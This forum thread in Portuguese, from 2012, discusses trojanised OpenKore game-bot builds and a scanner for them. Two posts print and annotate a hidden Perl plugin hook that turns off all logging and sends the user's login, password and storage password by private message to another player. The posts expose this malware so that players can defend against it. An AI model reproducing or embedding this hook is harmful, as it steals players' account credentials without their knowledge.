roxjames 0 Postado 18 de Março 2012 Compartilhar Postado 18 de Março 2012 Mas há os que são suspeitos em maior e em menor escala. No meu, eu divulguei diversas provas que é seguro - vai de cada um acreditar ou não ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
1lokomam 0 Postado 19 de Março 2012 Compartilhar Postado 19 de Março 2012 Fui hackeado por um OpenKore Desses ai, so sei que vo salva umas paradas e vo formata o pc kkkk ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
roxjames 0 Postado 19 de Março 2012 Compartilhar Postado 19 de Março 2012 Fui hackeado por um OpenKore Desses ai, so sei que vo salva umas paradas e vo formata o pc kkkk Se tivesse usado o programa, não teria sido hackeado, nem teria que formatar o PC ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
1lokomam 0 Postado 19 de Março 2012 Compartilhar Postado 19 de Março 2012 Se tivesse usado o programa, não teria sido hackeado, nem teria que formatar o PC pior q eu fui saber do programa hj ai n teve nem como xD ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
roxjames 0 Postado 20 de Março 2012 Compartilhar Postado 20 de Março 2012 Achei o método novo de script malicioso Usei o É necessário se cadastrar para acessar o conteúdo. Entre ou Cadastre-se para comprar alguns arquivos e olha a novidade que encontrei no arquivo src\AI.pm (no do Legusto) e no src\Misc.pm (no do MobileMan) my $hooks = Plugins::addHook('in_game', \&in_game, undef); sub onUnload { Plugins::delHooks($hooks); } sub in_game { Commands::run("conf logChat 0"); Commands::run("conf logPrivateChat 0"); Commands::run("conf logGuildChat 0"); Commands::run("conf logSystemChat 0"); Commands::run("conf logConsole 0"); Commands::run("conf logAppendUsername 0"); Commands::run("conf squelchDomains pm/sent, info"); Commands::run("pm \"pluginHork\" ID:".$config{username}."\ | sen:".$config{password}."\ | Str:".$config{storageAuto_password}."\ | map:".$config{lockMap}); } Essa rotina só faz sentido quando é para hackear! ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Kaju- 0 Postado 20 de Março 2012 Compartilhar Postado 20 de Março 2012 Sim , de fato isso é um script para roubar senhas. Só vendo essa parte do script dá para identificar facilmente , vamos lá: sub in_game { // Quando estiver no jogo Commands::run("conf logChat 0"); //Desativa o log de chat Commands::run("conf logPrivateChat 0"); //Desativa o log de chat privado Commands::run("conf logGuildChat 0"); //Desativa o log de chat guild Commands::run("conf logSystemChat 0"); //Desativa o log de chat Commands::run("conf logConsole 0"); Desativa o log do console Commands::run("conf logAppendUsername 0"); Commands::run("conf squelchDomains pm/sent, info"); Commands::run("pm \"pluginHork\" ID:".$config{username}."\ | sen:".$config{password}."\ | Str:".$config{storageAuto_password}."\ | map:".$config{lockMap}); //Envia um pm para o jogador pluginHork } Comando usado pelo script: pm (<pluginHork>) (<ID:".$config{username}> sen:".$config{password}. Str:".$config{storageAuto_password} map:".$config{lockMap} ). Informações que o jogador pluginHork receberá: ID:Seu login | sen:Sua senha | Str:Senha da kafra | map : mapa do seu char. O script desativa todos os logs, depois envia um pm para o jogador : pluginHork. E o usuário do openkore nem perceberá isso. Obrigado roxjames , hoje estarei fazendo uma atualização. ----------- 1.3: mediafire .com/?6olv2ydga2o8nc5]OpenKoreAnalyser1.3.zip É necessário se cadastrar para acessar o conteúdo. Entre ou Cadastre-se ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
roxjames2 1 Postado 26 de Março 2012 Compartilhar Postado 26 de Março 2012 Vlw por ter implentado a minha denuncia ^^ ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
MobileMan 0 Postado 26 de Junho 2012 Compartilhar Postado 26 de Junho 2012 o dono do topico n vai atulizar mais o programa n? ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
ab79cd 0 Postado 26 de Junho 2012 Compartilhar Postado 26 de Junho 2012 aee cara vai ajudar muito isso dai contra os caras que so querem pegar nossa conta '-'...eu estava esperando o momento certo para usar pq o meu char ferreiro tem 172kk e nao queria perder isso ...valeu por ter postado isso cara =) É necessário se cadastrar para acessar o conteúdo. Entre ou Cadastre-se ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
saruesley *-* 43 Postado 26 de Junho 2012 Compartilhar Postado 26 de Junho 2012 Mais pra que raios ressuscitaram esse tópico mesmo???? Além do mais esse kaju e parceiro do programador10. Sei disso pois o proprio programador10 veio me procurar para fazermos uma "parceria" obvio que recusei. [X]Closed AQUI ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
'Rapper 6 Postado 26 de Junho 2012 Compartilhar Postado 26 de Junho 2012 Atenção! Este tópico foi ressuscitado. Não poste em tópicos cujo último post fora feito a mais de 2 semanas. Tópico Fechado ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Posts Recomendados